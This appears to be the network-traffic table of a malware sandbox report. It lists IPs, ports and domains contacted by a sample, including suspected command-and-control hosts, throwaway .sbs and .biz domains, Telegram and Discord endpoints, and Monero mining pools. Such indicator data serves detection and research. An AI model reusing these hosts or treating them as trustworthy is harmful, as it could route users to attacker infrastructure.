| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 64.94.85.117:443 | tcp | |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 154.216.20.190:4449 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 154.216.20.190:4449 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | update.volam2005pk.com | udp |
| VN | 103.200.22.212:80 | update.volam2005pk.com | tcp |
| RU | 185.215.113.19:80 | tcp | |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| NL | 92.123.77.67:80 | r11.o.lencr.org | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| UZ | 90.156.163.98:40500 | udp | |
| YE | 94.26.213.11:40500 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| NL | 2.19.194.200:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 184.25.193.234:80 | www.microsoft.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| KZ | 92.46.228.246:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| MX | 201.108.200.21:40500 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| IR | 2.179.60.101:40500 | udp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| KZ | 5.76.2.36:40500 | udp | |
| TR | 91.93.138.14:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| UZ | 90.156.160.43:40500 | udp | |
| US | 64.94.85.117:443 | tcp | |
| KZ | 82.200.228.118:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| YE | 134.35.100.89:40500 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| IR | 89.219.115.156:40500 | udp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | servicetelemetryserver.shop | udp |
| US | 104.21.56.121:80 | servicetelemetryserver.shop | tcp |
| US | 104.21.56.121:80 | servicetelemetryserver.shop | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| UZ | 195.158.18.194:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| GB | 2.101.182.195:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| UZ | 90.156.163.119:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 37.21.26.152:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| MX | 187.194.22.140:40500 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| UZ | 89.249.62.92:40500 | udp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| KR | 211.204.100.20:1234 | 211.204.100.20 | tcp |
| US | 154.216.20.190:4449 | tcp | |
| RU | 83.217.209.11:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 83.239.55.170:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| YE | 46.161.233.39:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| UA | 212.22.213.217:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| UZ | 194.93.26.59:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 83.217.209.11:80 | tcp | |
| IR | 2.190.49.145:40500 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| UZ | 89.249.62.87:40500 | udp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| KZ | 88.204.209.230:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| VE | 190.77.159.119:40500 | udp | |
| CN | 47.120.46.210:80 | tcp | |
| N/A | 192.168.1.4:4444 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 198.163.193.223:40500 | udp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| KZ | 5.63.94.144:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 5.139.95.144:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| IR | 2.181.218.207:40500 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| YE | 178.130.118.237:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| KZ | 92.47.143.122:40500 | udp | |
| IR | 2.181.30.194:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| GR | 85.73.234.113:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| PK | 124.109.48.132:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| UZ | 90.156.194.154:40500 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 109.173.111.27:40500 | udp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| US | 154.216.20.190:4449 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| RU | 31.23.95.118:40500 | udp | |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 34.102.78.64:9002 | 34.102.78.64 | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | uXPSmpVlnejowfEuOvrjEhYZ.uXPSmpVlnejowfEuOvrjEhYZ | udp |
| MX | 189.135.23.235:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| MX | 187.192.185.201:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| IR | 2.182.195.184:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| IR | 93.118.99.152:40500 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| SY | 77.44.228.98:40500 | udp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| EG | 45.241.38.203:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | loader.hxsoftwares.com | udp |
| US | 172.67.71.221:443 | loader.hxsoftwares.com | tcp |
| MX | 189.133.187.71:40500 | udp | |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| RU | 91.122.18.161:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| ZA | 41.185.18.178:7777 | tcp | |
| TR | 85.103.235.188:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| IR | 77.81.130.60:40500 | tcp | |
| UZ | 185.203.237.215:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| BG | 146.70.53.161:40500 | udp | |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 178.71.163.141:40500 | udp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| PK | 203.99.184.103:40500 | udp | |
| N/A | 10.127.0.99:7777 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| MX | 189.164.170.136:40500 | tcp | |
| UZ | 93.188.85.2:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 10.127.0.99:7777 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| N/A | 10.127.0.99:7777 | tcp | |
| UZ | 146.120.17.117:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| UZ | 89.236.234.204:40500 | udp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| ZA | 41.185.18.178:7777 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.61.114:10343 | xmr-eu2.nanopool.org | tcp |
| US | 64.94.85.117:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 91.122.218.118:40500 | udp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| PL | 54.37.232.103:14433 | xmr-eu1.nanopool.org | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CN | 124.70.140.100:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 38.224.37.24:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| KZ | 5.251.95.166:40500 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| UZ | 87.237.234.159:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| IR | 93.119.90.81:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 212.3.146.135:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| SY | 178.253.102.221:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | voter-screnn.cyou | udp |
| US | 172.67.190.56:443 | voter-screnn.cyou | tcp |
| US | 8.8.8.8:53 | plastic-mitten.sbs | udp |
| US | 8.8.8.8:53 | looky-marked.sbs | udp |
| US | 8.8.8.8:53 | wrench-creter.sbs | udp |
| US | 8.8.8.8:53 | slam-whipp.sbs | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| NL | 62.60.217.159:15666 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 198.163.193.6:40500 | udp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 8.8.8.8:53 | record-envyp.sbs | udp |
| US | 8.8.8.8:53 | copper-replace.sbs | udp |
| US | 8.8.8.8:53 | savvy-steereo.sbs | udp |
| US | 8.8.8.8:53 | preside-comforter.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 104.86.41.223:443 | steamcommunity.com | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| SY | 82.137.218.134:40500 | tcp | |
| ZA | 41.185.18.178:7777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| IR | 2.189.231.17:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 154.216.20.190:4449 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| RU | 31.163.71.248:40500 | udp | |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| NL | 91.92.240.41:80 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| YE | 134.35.158.149:40500 | udp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 91.92.243.191:5401 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 154.216.18.132:6868 | tcp | |
| IR | 188.209.32.217:40500 | udp | |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| DE | 104.86.41.223:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| KZ | 46.36.149.47:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| IR | 78.38.107.167:40500 | tcp | |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | download.emailorganizer.com | udp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| ZA | 41.185.18.178:7777 | tcp | |
| FR | 91.134.10.168:443 | i.ibb.co | tcp |
| US | 154.216.18.132:6868 | tcp | |
| UZ | 90.156.163.91:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| VE | 200.8.215.130:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| IN | 3.6.115.64:18069 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 8.8.8.8:53 | HJhaTjOPrjURhc.HJhaTjOPrjURhc | udp |
| US | 154.216.20.190:4449 | tcp | |
| IR | 151.232.179.149:40500 | udp | |
| RU | 185.215.113.117:80 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| RU | 185.215.113.19:80 | tcp | |
| UZ | 90.156.162.125:40500 | udp | |
| RO | 72.5.42.222:8568 | tcp | |
| US | 8.8.8.8:53 | crl.comodoca.com | udp |
| US | 172.64.149.23:80 | crl.comodoca.com | tcp |
| US | 154.216.20.190:4449 | tcp | |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| IN | 103.92.101.54:80 | 103.92.101.54 | tcp |
| IR | 2.176.94.43:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| TH | 85.203.4.238:80 | 85.203.4.238 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| ZA | 41.185.18.178:7777 | tcp | |
| IR | 151.241.114.78:40500 | tcp | |
| US | 8.8.8.8:53 | YxqOyNKhQCB.YxqOyNKhQCB | udp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| IR | 80.191.218.209:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| RU | 188.119.66.185:443 | 188.119.66.185 | tcp |
| IR | 2.190.242.182:40500 | udp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.215.113.117:80 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| NL | 31.214.157.206:2024 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| UZ | 90.156.164.120:40500 | udp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| UZ | 93.188.86.208:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| RU | 185.215.113.19:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| IR | 185.123.69.190:40500 | udp | |
| DE | 88.99.151.68:7200 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| KZ | 89.218.244.178:40500 | tcp | |
| CN | 219.159.184.14:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| DE | 88.99.151.68:7200 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| NL | 91.92.240.41:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.20.190:4449 | tcp | |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 88.99.151.68:7200 | tcp | |
| ZA | 41.185.18.178:7777 | tcp | |
| CN | 117.146.200.209:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| DE | 88.99.151.68:7200 | tcp | |
| IR | 85.185.218.219:40500 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| RU | 185.215.113.19:80 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| DE | 88.99.151.68:7200 | tcp | |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| FR | 92.122.50.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 91.92.240.41:80 | tcp | |
| DE | 88.99.151.68:7200 | tcp | |
| N/A | 192.168.4.185:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| GB | 82.117.243.110:5173 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 8.8.8.8:53 | acpressions.com | udp |
| US | 172.67.213.7:80 | acpressions.com | tcp |
| US | 172.67.213.7:80 | acpressions.com | tcp |
| FR | 142.250.178.130:80 | pagead2.googlesyndication.com | tcp |
| FR | 142.250.178.130:80 | pagead2.googlesyndication.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 172.67.213.7:443 | acpressions.com | tcp |
| DE | 88.99.151.68:7200 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 88.99.151.68:7200 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | runvrs.com | udp |
| NL | 188.116.21.204:5432 | runvrs.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 91.92.240.41:7575 | tcp | |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| N/A | 10.127.0.99:7777 | tcp | |
| N/A | 10.127.0.99:7777 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| NL | 188.116.21.204:5432 | runvrs.com | tcp |
| N/A | 127.0.0.1:56413 | tcp | |
| N/A | 127.0.0.1:56440 | tcp | |
| N/A | 127.0.0.1:56531 | tcp | |
| N/A | 127.0.0.1:56534 | tcp | |
| N/A | 10.127.0.99:7777 | tcp | |
| N/A | 127.0.0.1:57782 | tcp | |
| N/A | 127.0.0.1:57999 | tcp | |
| N/A | 127.0.0.1:58055 | tcp | |
| N/A | 127.0.0.1:58102 | tcp | |
| N/A | 127.0.0.1:58116 | tcp | |
| N/A | 127.0.0.1:58127 | tcp | |
| N/A | 127.0.0.1:58132 | tcp | |
| N/A | 127.0.0.1:58143 | tcp |
Files
